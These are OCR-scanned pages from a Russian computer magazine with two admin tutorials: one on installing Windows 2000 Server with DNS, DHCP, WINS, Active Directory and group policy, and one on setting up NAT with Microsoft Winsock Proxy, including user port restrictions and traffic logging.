тейнере акка- 
унты, и все 
это относится 
к домену sub- 
domain, при- 
чем он явля- 
ется поддоме- 
ном domain, 
входящим в 
домен yes %). 


ты посмотри вокруг - 

эти железки заполня- 

ют практически все 
свободное пространство, к тому же с 
наращиванием производительной 
мощи :) додумались объединить весь 
информационно-перерабатывающий 
механизм в огромные мегасети. Вон, 
я погляжу, и к твоему железному 
другу тянется проводок, и весело 
подмигивает диодик, радостно гово- 
ря о том, что битики и байтики с ог- 
ромной скоростью вливаются в же- 
лезный организм на переработку. Но 
с такими темпами развития сетевых 
организмов встал и другой вопрос, а 
как, собственно, всем этим управ- 
лять? Не, ну понятно, можно вруч- 
ную установить и настроить 1-2-3-4 
компа, но когда приходится иметь де- 
ло с достаточным количеством ма- 
шин, человек, за это отвечающий 
(читай админ :), имеет нехилые проб- 
лемы, и встает очередной вопрос, 
как можно упростить себе жизнь... В 
общем-то, об этом я и собрался тебе 
сегодня рассказать. 


ЧТО ЗА ЗВЕРЬ WIN2KSERVER? 
Вообще, название говорит само за се- 
бя - это очередная “супербезопасная” 
серверная ось от компании Microsoft. 
Сейчас мы с тобой как раз и разберем- 
ся, как же установить и настроить это 
чудо, но для начала давай определим- 
ся с дистрибутивом. Их существует аж 
3 штуки, главным отличием между ко- 
торыми являются цена и количество 
поддерживаемых процессоров/памя- 
ти/кластеризации. Если у тебя <= 4х 
процессоров и 4 Гб памяти, то я npeg- 
лагаю тебе остановить свой взгляд на 
самом скромном варианте - коробочке 
с надписью Windows 2000 Server без 
всяких артефактов в виде приставок 
Advanced или Datacenter. Выбирая 
русскую версию, ты избавляешься от 
проблем с поиском дистриба (пара- 
докс, но найти Епд версию сервера на 
прилавках было достаточно трудно), 
да и потом легче будет освоить, если 
все хелпы в системе сделаны на вели- 
ком и могучем. Итак, с дистрибом ра- 
зобрались, теперь давай посмотрим, 
что же предлагается для упрощения 
нелегкой админской жизни. В состав 
системы входят такие службы, как 
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WIN2KSERV - ДОРОГА В AD 


СТАВИМ И НАСТРАИВАЕМ WIN2K SERVER 
В ЛОКАЛЬНОЙ СЕТИ 


Frozen (frozen@real.xakep.ru) 


Рабочий стол после установки OC 


DNS, DHCP, FTP, HTTP и мегавещь - 
Active Directory (дальше для упроще- 
ния я буду писать AD). 


AD И ВСЕ-ВСЕ-ВСЕ 

AD (или “служба каталогов" по-рус- 
ски) - это огромное хранилище, KOTO- 
рое может хранить разную информа- 
цию о пользователях, компьютерах, 
принтерах и вообще еще много всего; 
это основное, что нам понадобится 
для дальнейшей работы. Каждая еди- 
ница, хранящаяся в AD, называется 
объектом, причем служба также хра- 
нит и информацию о самом объекте и 
его свойствах, и называется это атри- 
буты объекта. Для доступа к службе 
существует специальный протокол 
LDAP (Lightweight Directory Access 
Protocol - простой протокол доступа к 
каталогам), который и определяет спо- 
собы доступа и обращения между кли- 
ентом и сервером AD. Здесь для каж- 
дого объекта есть его собственное 
особенное имя, с помощью которого и 
можно различать, что перед нами на- 
ходится, данные о пользователе или 
же компе. Причем это имя помогает 
найти путь в AD, где этот объект ле- 
жит. У имени есть две основных части 
- СМ (common name - общее имя) и DC 
(domain component - доменный компо- 
нент). CN показывает на объект или 
место, где он лежит, а DC говорит о go- 
мене, к которому относится объект. 
Вот, например, имя 

CN=Vasilii,; CN=Guests,CN=Accounts,DC= 
subdomain,DC=domain,DC=yes говорит 


о TOM, что пользователь Василий ne- 
жит в контейнере гостей, который, в 
свою очередь, лежит в контейнере ак- 
каунты, и все это относится к домену 
subdomain, причем он является Noggo- 
меном domain, входящим в домен yes 
%). Вот так все запутано, но на деле 
выглядит гораздо проще и понятнее, о 
чем мы поговорим дальше. А в гло- 
бальном смысле AD делится на леса, 
деревья, домены и OU (Organization 
Unit - организационная единица), то 
есть полная аналогия с реальной при- 
родой, где домены представляются 
ветками, объединение доменов - дере- 
во и скопище деревьев - лес. Но это 
обычно требуется в больших органи- 
зациях, нам же хватит и одного доме- 
на, который по совместительству бу- 
дет являться и деревом, и лесом :). Ко- 
роче говоря, хватит лирической тео- 
рии, будем осваивать все это дело на 
практике. 


УСТАНОВКА СЕРВЕРА 

Если ты приобрел загрузочный диск, 
то просто вставляй его в ЦэДэЭРОМ и 
следуй появляющимся инструкциям, 
благо процесс установки не сильно 
изменился со времен MS-DOS. Если 
же нет, то топай в папочку 1386 и 
вводи winnt, после чего опять же на 
экране появятся привычные буков- 
ки. Обычно единственное, что от те- 
бя требуется, - это настройка всяких 
параметров, относящихся к выбору 
страны, часового пояса да ввода 
имени компа и задания админского 


пароля (который я советую тебе ста- 
рательно запомнить - без него ты 
просто не попадешь в систему). Для 
нашего примера я буду использо- 
вать в качестве имени компьютера 
SERVER-PDC. После успешной уста- 
новки и загрузки только что уста- 
новленных виндов появится таблич- 
ка, советующая нажать Ctrl-Alt-Del, 
делай распальцовку - не бойся - это 
сделано для повышения "безопас- 
ности". Ну и дальше просто логи- 
нишься админом, и перед тобой воз- 
никает рабочий стол примерно сле- 
дующего вида (я уже поставил все 
драйвера для устройств): 

То есть запускается что-то похожее 
на мастер, который по идее должен 
был бы упростить настройку сервера, 
однако на деле получается странная 
вещь - ты не можешь установить 
Active Directory, пока не установишь 
DNS-cepsBep, который предлагается ус- 
тановить автоматически, но для инс- 
талла у тебя должен быть пароль, ко- 
торый ты получишь только после ус- 
тановки AD, - замкнутый круг выходит. 
Да и потом, настраивая все вручную, 
ты будешь полностью уверен в наст- 
ройках, ведь сам знаешь - полагаться 
Ha defaults, предлагаемые дядей Бил- 
ли, это смешно. 


КОРНИ СЕРВЕРА, 

НАСТРОЙКА DNS 

Я думаю, не нужно объяснять, что это 
за служба и для чего она предназна- 
чена, об этом не раз писали в журна- 
ле, да и потом документов по этому 
делу навалом. А у нас же без нее во- 
обще ничего работать не будет, так 
как для нормальной работы AD необ- 
ходимо правильное сфункционирова- 
ние сервера на 53 порту :). Ты, конеч- 
но же, можешь установить отдельный 
DNS-cepBep на другой компьютер, но 
помни, что для создания “каталога” 
нужна поддержка динамического DNS. 
В общем, доставай диск с Виндой и то- 
пай по направлению «установка ком- 
понентов Windows->ceTeBble службы- 
>DNS», там ставь птицу и жми ОК. 
Поздравляю, ты только что установил 
DNS, но теперь тебя ждет нелегкий 
процесс настройки (кстати, учти - для 
нормального продолжения твоему 
серверу нужно назначить статический 
(aka постоянный) IP-agpec и указать 
первичный DNS-cepBep), ведь все это 
надо подогнать под твои конкретные 
потребности. Для этого идем в «па- 
нель управления-?администрирова- 
ние» и кликаем на появившемся знач- 
ке DNS, откроется консоль управле- 
ния, и ты увидишь примерно следую- 
щую картинку: 

Кликай на папке “Зоны прямого прос- 
мотра" (правой кнопой крыски :) и вы- 
бирай пункт “создать новую зону". 
После этого запустится мастер, кото- 
рый поможет произвести начальную 
настройку, тебе предложат на выбор 
три типа зон - “Интегрированная в 
Active Directory”, "Основная" и “До- 


полнительная"”, причем первый пункт 
будет неактивный (по причине отсут- 
ствия AD), а последний выбирать не 
имеет смысла, пока не создана основ- 
ная. Так что есть всего единственное, 
что ты можешь выбрать, - это золотую 
середину :). Следующим этапом нужно 
задать имя нового домена (если у тебя 
уже есть домен в Сети, можешь ука- 
зать его, а если нет - то любое имя, ко- 
торое только вздумается), после чего 
ты опять можешь порадоваться толь- 
ко что созданной записи зоны. Но не 
все так просто, как кажется сначала... 
Ведь у тебя создана только одна пер- 
вичная зона, причем не указан ни 
один узел (кроме сервера имен), и к то- 
му же в таком виде ничего нормально 
работать не будет. Чтобы исправить 
создавшееся положение, предлагаю 
привнести в дефолтовую установку 
некоторое разнообразие. Во-первых, 
советую добавить узел localhost (с ag- 
ресом 127.0.0.1), SERVER-PDC и псевдо- 
нимы для разных сервисных служб (то 
есть www, ftp, pop и т.д.), делается это 
все через ту же правую кнопку мышки. 
Во-вторых, по умолчанию наш сер- 
вер/зона (вообще говоря, настройки 
сервера и зоны могут отличаться) не 
поддерживает динамическое добавле- 
ние, которое потребуется при установ- 
ки AD (ты же не хочешь ручками про- 
писывать каждый компьютер, который 
собираешься присоединить к домену). 
Надеюсь, трудностей это вызвать 
не должно - с этой стороны все go- 
вольно просто. К слову говоря, ты 
можешь создать еще и зону обратно- 
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го просмотра, для каждой из зон пря- 
мого поиска - это нужно для обратно- 
го преобразования IP-agpec -> имя уз- 
ла, делается это аналогично настрой- 
ке прямой зоны. 

На этом считаю настройку DNS-cep- 
вера законченной, и можно теперь 
приступить к установке других компо- 
нентов сервера. 

У меня после всех хитроумных махи- 
наций получилось вот что: 


ОНСР - ПОМОЩНИК АДМИНА 

Для начала немного теории - служба 
ОНСР предназначена для того, чтобы 
ты не мучался и не прописывал ручка- 
ми все сетевые настройки на каждой 
клиентской машине, все сделается са- 
мо. А при нормальной настройке каж- 
дому компу не только выделится IP- 
шник, но еще и передадутся сведения 
о маске подсети, шлюзе, днс-сервере, 
имени домена, WINS-cepBepe (06 этом 
дальше) и еще много всякой полез- 
ной информации, к тому же имя узла 
автоматически зарегистрируется на 
нашем DNS. Надеюсь, ты оценил все 
полезности этого сервиса, а я помогу 
тебе его установить и настроить. Итак, 
тебе опять нужен дистрибутив с Вин- 
дами, а дальше делаешь все то же са- 
мое, что и в предыдущем пункте, толь- 
ко теперь нужно поставить галочку 
напротив “DHCP”. В принципе, теперь 
нужно проделать шаги, аналогичные 
тем, что мы делали при настройке 
DNS, только с тем лишь отличием, что 
go этого мы настраивали статические 
адреса, а здесь нужно будет распре- 
делить пространство адресов для 
всех клиентских машин и указать, ка- 
кие параметры им требуется принять с 
сервера. Небольшой хинт - после соз- 
дания области адресов уже будет не- 
возможно поменять указанную маску 
подсети, так что не ошибайся, а то 
придется все удалять и настраивать 
заново. В процессе создания области 
можно выделить несколько ключевых 
моментов - это, собственно, само зада- 
ние диапазона IP, добавление исклю- 
чений (то есть распределение тех ag- 
ресов, которые не будут выдаваться 
компьютерам в сети - это нужно для 
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Сначала onpe- 
делись с ти- 
пом ОСей 
компьютеров, 
которые будут 
включены в 
твой новый 
домен, потому 
что изначаль- 
но сервер ра- 
ботает в так 
называемом 
Смешанном 
режиме"', ког- 
да каталогом 
могут пользо- 
ваться как 
клиенты 
WinNT4/9x, 


Tak и 
\Мт2000/ХР. 
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При добавле- 
нии нового 
юзверя тебе 
предлагается 
настроить 
лишь малую 
часть доступ- 
ных парамет- 
ров, все же 
прелести ты 
сможешь ощу- 
тить при наст- 
ройке свойств 
через ПКМ :). 


того, чтобы оставить постоянные ag- 
реса для узлов-серверов), ну и наст- 
ройка дополнительных параметров 
(тут как раз и указываются всякие 90- 
полнительные сведения, про которые 
я говорил выше). Для того чтобы уста- 
новить авторегистрацию на сервере 
имен, нужно зайти на вкладку "ОМ" в 
свойствах области. После шаманства 
я увидел на экране следующее: 


ВСПОМНИМ 0 СТАРОМ - 

СЛУЖБА WINS 

WINS (Windows Internet Naming Service 
- Сетевая служба имен виндовс) - это 


Установленный DHCP 


старый, тормознуто-глючный аналог 
О№ ‘а, скрещенного с ОНСР'ой, кото- 
рый предоставлял схожие функции и 
работал с NetBIOS (то есть тут проис- 
ходит регистрация имени компа и пре- 
образование имя-Ме{В!О5 -> IP-agpec). 
Подробнее об этой службе ты можешь 
прочитать в многочисленных КТЕМах. 
Конечно, можно обойтись и без этого 
атавизма, но, к великому сожалению, 
еще не все пользователи пересели на 
Win2k и ХРюнделей, да и ктому же 
программ, использующих нетбиос по- 
ка предостаточно, так что придется ос- 
ваивать и управление этим сервисом. 
Установка же этого добра на наш сер- 
вер до смешного проста, так что я не 
буду на этом задерживаться, а после 
предыдущих двух шагов у тебя все 
должно получиться. 


ACTIVE DIRECTORY - ПРОЦЕСС 
ПОШЕЛ 

Вот мы и добрались go самого глав- 
ного, того, ради чего выполняли все 
предыдущие настройки, - настало 
время установить и настроить служ- 
бу каталога. Для этого запускай мас- 
тер командой dcpromo.exe, но перед 
этим убедись, что на диске, предназ- 
наченном для базы AD, хватает мес- 
та (-200-500 мегов на среднюю сеть 
должно хватить), а также учти - ну- 
жен хотя бы один раздел с NTFS, на 
котором будет лежать папка 
SYSVOL. Теперь будем разбираться 
по шагам, чего же от нас хотят: для 
начала тебе нужно указать тип твое- 
го контроллера домена, но посколь- 
ку у нас сеть небольшая с одним 
сервером, то выбираем “Контроллер 
домена в новом домене". Дальше до 
момента указания места, где будет 
располагаться база данных и жур- 
нал, все должно быть ясно из рас- 
суждений в начале статьи, да ис 
местоположением ты тоже уже дол- 
жен был определиться. И к тому же, 
так как мы с тобой уже создали сер- 
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вер днс, то можно с чистой совестью 
пропустить пункт автонастройки сер- 
вера имен, остальные же шаги не яв- 
ляются особо стремными, да и всюду 
присутствуют подсказки, которые 
должны помочь тебе сделать пра- 
вильный выбор. 

Посидев в ожидании некоторое 
время, следя за процессом создания 
каталога, ты увидишь окно, возве- 
щающее об окончании установки, со 
списком всего сделанного и всех 
проблем, которые возникли, тебе же 
осталось только нажать кнопочку 
“готово”. После успешной установ- 
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ки, пока не забыли, советую тебе 
сделать один немаловажный шаг - 
авторизировать DHCP в AD, иначе 
потом могут возникнуть проблемы с 
распределением адресов (это сдела- 
но для повышения безопасности, 
чтобы всякие левые серваки не ме- 
шали работе твоей сети). Делается 
это очень просто - в консоли DHCP 
делаешь ПКМ (правый клик мышкой) 
на сервере и выбираешь “Авторизи- 
ровать...", после чего добавь адрес 
своего сервера в список. 

Ну, все, самое сложное закончилось, 
и теперь тебя ждет увлекательный 
процесс администрирования, поэтому 
соберись с мыслями, составь в голове 
план нужных HACTPOeK, и понеслась... 


Авторизация ОНСР-сервера 


АДМИНИМ... 

Сначала определись с типом ОСей 
компьютеров, которые будут вклю- 
чены в твой новый домен, потому 
что изначально сервер работает в 
так называемом "Смешанном режи- 
ме", когда каталогом могут пользо- 
ваться как клиенты WiNNT4/9x, так и 
Win2000/XP. В этом случае сущест- 
вует ряд ограничений, связанных с 
безопасностью и с некоторыми дру- 
гими операциями (например, нельзя 
создавать в домене группы типа 


“Универсальная",). Так что за работу 
со старыми операционками прихо- 
дится расплачиваться. А если же все 
нужные компы в сети работают под 
2К/ХР, то советую сразу переклю- 
чить сервер в основной режим (но 
будь осторожен - обратное преобра- 
зование невозможно!), для чего нуж- 
но запустить консоль управления 
AD (Администрирование -> Active 
Directory - пользователи и компью- 
теры либо из командной строки - 
dsa.msc), а там заходишь в свойства 
домена, и сразу все станет ясно. 

Теперь давай разберемся с тем, как 
добавить (настроить) пользовате- 
лей/группы/компы/ ОЧ. Надеюсь, ты 
еще не закрыл консоль? Иначе откры- 
вай все заново и наблюдай на экране 
такое окно: 

Как видишь, тут все похоже на обыч- 
ный диск, за исключением того, что 
папки содержат не дфайлы, а объекты, 
а сами папки - это те самые контейне- 
ры. Если посмотреть внимательнее, то 
можно заметить различие иконок у 
папки - либо просто папка, либо папка 
с открытой книгой внутри - так разли- 
чаются встроенные контейнеры и OU. 
Еще их различие заключается в том, 
что первые нельзя ни удалить, ни при- 
менить к ним GP (Group Policy - груп- 
повую политику), зато все поддержи- 
вают делегирование управлением (об 
этом чуть ниже). 

Каждому компьютеру и пользовате- 
лю, которые должны входить в домен, 
должна соответствовать учетная за- 
пись, которая создается внутри кон- 
тейнера (все компьютеры, которые ты 
будешь подключать к домену с клиен- 
тской машины, будут помещаться в 
Computers). Причем никаких ограниче- 
ний по расположению в определен- 
ном месте нет (то есть ты можешь CO3- 
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Консоль управления АБ 


давать учетные записи пользовате- 
лей в Computers, а компьютеров - в 
Users), но лучше все распределять по 
смыслу, чтобы потом не запутаться. 
Для того чтобы создать дополнитель- 
ные ОЧ, нужно выполнить ПКМ (там, 
где это нужно)->Создать->Подразделе- 
ние, и получится новый контейнер. Я 
сделал так: 

А теперь можешь с легкостью ветра 
создавать записи пользователей и 
группы в этих OU. Кстати говоря, при 
добавлении нового юзверя тебе npeg- 


лагается настроить лишь малую часть 
доступных параметров, все же прелес- 
ти ты сможешь ощутить при настрой- 
ке свойств через ПКМ :). 

Пришло время разобраться с груп- 
повыми политиками, а то говорили о 


них достаточно, но gO этого момента с 
СР еще не сталкивались. Как я уже го- 
ворил раньше, настраивать ройсу 
можно только gna OU, а делается это 
через свойства контейнера: 

Причем, добавляя политику, помни, 
что применяются они в таком поряд- 
ке: локальная->сайт->домен->О0Ц(1)->...- 
>ОЧ(п)->политика1-?политика2->поли- 
тиказ3, то есть сверху вниз по наше- 
му дереву :). Если СР от разных 
уровней между собой не конфликту- 
ют, то они как бы сливаются и 
действуют вместе, в ином случае ра- 
ботает более низкоуровневая. А что- 
бы избежать проблем с запрещени- 
ем действий на какую-то единицу 
всех политик, существует перекры- 
тие и блокирование наследования: 


Групповые политики 


Причем если одновременно выбрано 
"не перекрывать" и “блокировать нас- 
ледие" на разных уровнях, то более 
сильным правилом является первое. 

Но игра не стоила бы свеч, если 
бы не было того количества настра- 


иваемых параметров, которое ста- 
новится доступным при работе с СР. 
Ты, наверное, не раз читал о том, 
как можно отключать всякие пунк- 
ты меню в пуске, запрещать смену 
параметров экрана, настраивать па- 
нель управления и систему, но для 
этого приходилось все ручками пра- 
вить в реестре. Причем не всегда 
можно было быть уверенным на 
100% в смысле и результате наст- 
ройки. Теперь же ты можешь управ- 
лять сразу ВСЕМИ компьютера- 
ми/пользователями сети, настраи- 
вая нужные параметры с помощью 
политик, а все изменения автомати- 
чески внесутся в реестр при следу- 
ющем входе объекта в домен. Опи- 
сывать все возможные настройки 
не имеет смысла по причине их ко- 
личества, да и потом на вкладке 
“Объяснение” каждого пункта впол- 
не понятно рассказано, что и как 
работает. Наигравшись с настрой- 
кой прав, предлагаю заострить свое 
внимание на самой верхней папке в 
политике - “Конфигурация прог- 
рамм". При помощи этой фичи мож- 
но, не парясь, установить практи- 
чески любую программу на клиен- 
тский компьютер, даже не подходя 
к нему, а называется сия вещь SDP 
(Software Distribution Point - точка 
распространения программ). Суще- 
ствует два вида установки прог- 
рамм - “назначение” (жестко обоз- 
начить программу) и “опубликова- 
ние" (добавить возможность уста- 
новки через панель управления), 
причем можно управлять инстал- 
лом как для компьютеров, так и для 
пользователей (потому что для юз- 
веря и компа существуют две от- 
дельные части СР). Для распрост- 
ранения программы она должна 
быть упакована в М$!-формат 
(впрочем, если разработчик этого 
не сделал, на диске с Виндой долж- 
на находиться программа Winlnstall, 
специально для таких случаев). Я 
же покажу, как жестко назначить 
определенной группе приложение 
MSWord (я использую корпоратив- 
ную версию офиса). 


Сначала нужно указать сетевой 
путь, откуда будут распространяться 


программы, для этого открывай свой- 
ства “установки программ": 

Потом бери диск и запускай файл 
WORD.MSI с параметром /а, получится 
что-то вроде этого: 

Указываешь папку назначения, ко- 
торая должна быть доступна по сети, 
а дальше идет обычный инсталл офи- 
са, после чего через ПКМ нужно выб- 
рать “Создать-пакет..." и указать путь 
к публикуемому Bopgy (опять же ис- 
пользуется файл .MSI). 


HAPPY END 

Я, конечно же, не смог рассказать 
тебе всех вкусностей серверообраз- 
ных Винодов, на это нужно слишком 
много места, однако же, могу сказать 
- если грамотно все настроить, TO ag- 
минить будет легко, а проблем будет 
мало. Хотя если посмотреть на коли- 
чество заплат, производимых мелко- 
софтом, то нужно все время что-то 
патчить, но ведь ты на то и решил 
стать администратором, чтобы пои- 
меть нехилые проблемы и изучить 
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обратную сторону хака :). Со своей 
же стороны могу посоветовать поча- 
ще изучать логи (там не должно 
быть никаких Еггог'’ов и Warnin'ros), 
постоянно обитать на всяких Securi- 
{у-форумах и почаще апдейтить 
Вноды, и да поможет тебе RTFM. 
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Ты опять мо- 
жешь обле- 
ниться и захо- 
чешь, чтобы 
кто-то другой 
начал тебе по- 
могать - эта 
фича доступна 
с помощью де- 
легирования 
(доступно че- 
рез ПКМ на 
контейнере). 


А теперь мо- 
жешь с лег- 
костью ветра 
создавать за- 
писи пользо- 
вателей и 
группы в этих 
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СЕТЕВЫЕ ПРЯТКИ 


НАСТРАИВАЕМ МАТ ПОД WINDOWS 


Alex Shark 
(qqqqqwww@e-mail.ru). 


http://www. 
microsoft.com/ 
isaserver/eval- 
uation/previ- 
ousversions/ 
support.asp - 
официальный 
сайт поддерж- 
КИ winsock 
ргоху. 


http:// 
proxyfaq.nm.ru 
/msproxy/ 
main.htm - 
много инте- 
ресного про 
установку и 
настройку 
этого сервака. 
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Если у тебя в сети всего один модемный пул и именно через него ты хочешь 


прокси-сервер и зачем он нужен, ставь МАТ. 


то система переадре- 

сации пакетов. Ком- 

пы обычных юзве- 
ров, живущих под Линухом, не тре- 
буют доработки. В этом случае 
МАТ-сервер отлавливает в сети все 
“левые” пакеты и переадресует их 
в нужном направлении, не забывая 
подменить исходящий IP. Получив 
ответ, сервак пересылает пакет об- 
ратно юзверю. Вся прелесть в том, 
что не надо прописывать проксики 
дополнительно. Все происходит 
так, как если бы у всех был прямой 
канал в инет. Для мастдая все обс- 
тоит несколько иначе. Все нормаль- 
но работающие МАТ-сервера, кото- 
рые мне попадались, были писаны 
всем известным Билли. Первый - 
это winsock proxy, и второй - это 
ISA. Но ко второму еще не так силь- 
но развился софт, да и глюков в 
нем побольше будет. Помимо сер- 
вера придется поставить клиента, 
да и не просто так поставить, а пря- 
мо с сервера для поддержания 
синхронизации. 


Итак, для начала давай воткнем 
Winsock Server. Ставится он из па- 
кета Back Office (не путать с Back 
Orifice :). Ставится без особых 
проблем, сам сервак можешь ска- 
чать у мелко-мягких или купить на 
CD. Техническую поддержку по это- 
му серверу мелкие уже прикрыли, а 
следовательно, продукт уже боль- 
ше не развивается, последняя вер- 
сия 2SP1. Устанавливается все в 
два этапа. Единственное, что он 
требует, это предустановленный 
Windows Server, будь то NT4 или 
2000. После установки к сервайсу 
IIS у тебя прицепится еще несколь- 
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Первый раз в первый класс, 
так выглядит новенький сервачок 
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Окно настройки проксятника 


ко функций. Через них мы и будем 
настраивать МАТ. 


СЕТАП 

Для начала отрубай все, что тебе 
не надо. Для меня это ММТР, $МТР, 
HTTP и FTP сервера. Далее давай 
возьмемся за настройку winsock. 
Тут тебе придется правильно про- 
писать IP-agpec своей сети вместе с 
маской, дабы проксик не маршрути- 
зил пакеты в твою же сеть через 
себя. Это нужно для ограничения 
загрузки и правильного использо- 
вания проксика. Далее не мешает 
раздать права пользователям. Если 
у тебя есть домен, то все просто за- 
мечательно. Тут ты можешь назна- 
чить машины или пользователей, 
которым можно вылезать в сеть. К 
сожалению, ты не можешь вписать 
ограничение по трафику. Эта функ- 
ция считалась дополнительной, а 
после про весь этот сервак и вовсе 
забыли, забив на поддержку. Расп- 
ределять обязанности на группы 
пользователей я тебе не советую, 
потому что в логах сервера будет 
писаться именно группа, а не поль- 
зователь. А там, где ответственны 
все, ответственных нет. Пользова- 
телям для простоты можешь пока 
назначить права "Можно все". Если 
впоследствии ты найдешь, что кто- 
то слишком рьяно ползает по прок- 
сикам, можешь выкинуть у него из 
доступа порты 8080 и 3128. Если он 
не дурак, найдет проксики на 80-ом 
порту, а если дурак, начнет лазить 
как следует. 

Дальше идет создание логов. Луч- 
ше вынести все логи в отдельную 
папку и назначить параметр “ver- 
Бозе", что есть многословный. Эта 
функция добавит несколько полей 
к твоему логу и даст тебе больше 


организовать выход всей сети, да так, чтобы не объяснять всем и каждому, что такое 


информации о том, кто чем и куда 
лазает. Тут же ты можешь собрать 
несколько проксиков в один клас- 
тер и устроить распределенный goc- 
туп в инет. Это имеет смысл, только 
если у тебя действительно несколь- 
ко исходящих линий. 


ЮЗВЕРОВОДСТВО 

Для ограничения доступа всем и 
вся можно создать свои стандарты, 
например, всем разрешить 80 порт. 
Некоторым можно разрешить еще 
21, 25 и 110. В общем, тут твоя фан- 
тазия не ограничивается, можешь 
делать с пользователями что yrog- 
но. Очень полезная функция, так 
как именно с помощью нее ты и бу- 
дешь отрезать от инета некоторых 
особо опанных юзеров. Старайся 
также придерживаться ограниче- 
ний по имени пользователя, а не по 
имени машины. Иногда поменять 
имя на машине проще, чем узнать 
пароль пользователя. Тем более, 
что логины просто так не посмот- 
ришь, в отличие от списка извест- 
ных машин в домене. 


Сессии, которые есть в настоящий момент 


Многое зависит и от политики 
компании. То есть, если у тебя зап- 
рещено иметь ICQ, то советую тебе 
не давать разрешения пользовате- 
лям делать все. Если нельзя читать 
никакую другую почту кроме корпо- 
ративной, то не добавляй также в 
разрешенные порты 25 и 110. Kopo- 
че, решай с шефом, что можно де- 
лать всем, а чего нельзя. Если же 
ты сам себе хозяин, то посоветуйся 
со своей совестью. 

К сожалению, тут ты не сможешь 
назначить список разрешенных и 
запрещенных хостов, как и не смо- 
жешь контролировать контент про- 
летающего мимо трафика. Так что 
единственное, что ты можешь сде- 


Предустановленные протоколы 


лать для запрета (средствами МАТ 
и мастдая), - это записать эти хосты 
в локальную сеть, прописать их в 
localhost-Ta6nuue и назначить им 
жесткий IP в виде 127.0.0.1 или об- 
резать через IP-SECURITY. Но это 
не принципиальный выход, это что- 
то вроде отмазки. Лучше все-таки 
подключить нечто более сущест- 
венное. 


ДОВЕДЕНИЕ КЛИЕНТА 

до кондиции 

Все, после того как ты поставил и 
настроил сервак, самое время 
взяться за клиентов. Не ставь его 
на ту же машину, где и сервак, если 
это твоя тачка. Берешь любую тач- 
ку и по сети находишь свой сервак. 
Там должна быть расшарена папка 
mspcint, в которой лежит сетап для 
клиента. Не копируй к себе файлы, 
запускай прямо с сервера. Это де- 
лается для того, чтобы при смене 
настроек, нажав на клиенте кно- 
почку update, он не лез в локаль- 


всего попытается открыть порт с 
тем же номером и, если ему удаст- 
ся, то он установит у себя состоя- 
ние BIND и вернет клиенту код 
удачного завершения операции. В 
свою очередь клиент вернет проге 
номер сокета. В противном случае 
ошибка будет выглядеть так же, 
как если бы ты попытался открыть 
дважды один и тот же порт локаль- 
но. То есть прога опять не врубит- 
ся, а был ли мальчик. Единствен- 
ный минус всего этого действа - ес- 
ли у тебя в сети уже кто-то поднял 
ЕТР сервак, то тебе сделать это 
уже не удастся, то есть сервак-то 
поднимется, но виден он будет 
только из локалки. 


ТРАФИК И ЕГО ПРЕДЕЛЫ 

По умолчанию (или по предположе- 
нию фирмы мелкосост) ты должен 
читать go боли в глазах лог-файлы 
твоего сервака и в случае превы- 
шения трафика резать пользовате- 
ля руками из настроек сервака. 
Удобнее всего экспортировать лог 
в Excel и там уже определяться, ко- 
го резать, а кого оставить в покое. 
Однако и тут есть грабли. Если у те- 
бя в сети стоит свои собственные 
DNS и Май серваки, то их трафик 
подсчитываться не будет. Особен- 
но если эти серваки стоят на том 
же компе, где и МАТ, или за ним (со 
стороны пользователя). Можно, ко- 
нечно, извратиться и задать этот 
сервак как внешний, но реально 
трафик он съедает, когда письмо 
падает на сервак, а твой МАТ будет 


считать трафик только тогда, когда 
пользователь заберет свое мыло. С 
DNS обратный прикол, при запросе 
несуществующего адреса трафик 
по-любому будет считаться, поэто- 
му разнообразные баннеры и счет- 
чики будут кушать трафик так же, 
как и страничка, на которой они 
стоят. Советую срезать их всех как 
есть, лучше использовать для это- 
го агрегат вроде Outpost-a, который 
не надо настраивать как проксик, 
он просто смотрит за трафиком и 
срезает из него лишнее. Но если 
проги для контроля трафика есть, 
то прог для ограничений пользова- 
телей по трафику я пока не нашел, 
так что тут придется пока действо- 
вать руками. То есть с периодич- 
ностью раз в несколько дней тебе 
надо проверять трабрик и лезть в 
настройки проксика для выкидыва- 
ния зажравшегося пользователя. 
Можно сделать проще, договорить- 
ся с шефом, что ограничивать ты 
никого не будешь, но в конце меся- 
ца будешь показывать, кто сколько 
слил из сети, с последующей опла- 
той трафика по тарифу "Имеемый”. 
Можешь также рассказать об этом 
всем сотрудникам, с намеком на 
ящик пива, с последующим распре- 
делением трафика на других поль- 
зователей :). Так сказать, плавный 
развод :). Тут главное не перебро- 
сить трафик на тех, кто в отпуске 
или кого уже уволили. 


ЛИНЗЫ, МИКРОСКОПЫ 
И ТЕЛЕСКОПЫ 
Чтобы не портить глаза и нервы, 


Иногда поменять имя на машине проще, 
чем узнать пароль пользователя. 


ную папку и не пытался апдейтить 
все оттуда, а лез на сервер и качал 
обновления. После установки кли- 
ента надо перезагрузить тачку. Это 
просто необходимо, потому что 
клиент, по сути, подменяет а|-ку 
winsock2.dll на свою версию. И все 
проги, которые попытаются отк- 
рыть сокет для соединения с дру- 
гим компом в инете, будут обману- 
ты. То есть, на самом деле, никакой 
прямой сокет не откроется, все 
данные о соединении (прога, зап- 
росившая коннект, адрес и порт) 
будут упакованы в UDP пакет и 
посланы на МАТ сервак, в порт 
1745. Сервак переварит их и попы- 
тается сконнектиться, в случае уда- 
чи он перекинет клиенту все, что 
ему сказали в инете. В противном 
случае он даст отмашку клиенту, и 
тот зарубит соединение. То есть 
прога так и не поймет, был ли это 
реальный сокет или его жестко наг- 
нули. Если же прога попытается 
открыть сокет для прослушки (типа 
FTP сервак) то сервер МАТ прежде 
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люди пишут проги. Если тебе нужна 
какая-то прога, то это значит, что 
ты не первый, кто задался таким 
вопросом, а следовательно, такая 
прога уже есть. Осталось только 
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В MSDN от 
\$6.0 есть 
полное описа- 
ние полей лога 
+ тестовые 
программы для 
разбора. 


Не верь, что 
ISA лучше, 
он просто 
дороже. 
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В свое время 
Microsoft 
proxy server 
стоил 1900 
буказоидов. 


Не все проги 
правильно ра- 
ботают через 
МАТ, напри- 
мер, eMule ра- 
ботает криво. 


Настройка лог-файла 
с расширенной записью 


найти ее и поставить к себе. Сам 
мелкососрт, как я уже говорил, не 
предоставляет прог для мониторин- 
га. Поэтому будем мониторить дру- 
[UM COCPTOM. 

Есть отличная прога Internet 
Access Monitor, которая хоть и тре- 
бует регистрации на каждом шагу, 
отлично работает. Достаточно ска- 
зать ей, откуда брать лог-файлы, и 
после импорта логов она расскажет 
тебе все о пользователях. Кто каким 
браузером пользуется и куда он хо- 
дит (достоверен только IP-agpec), и 
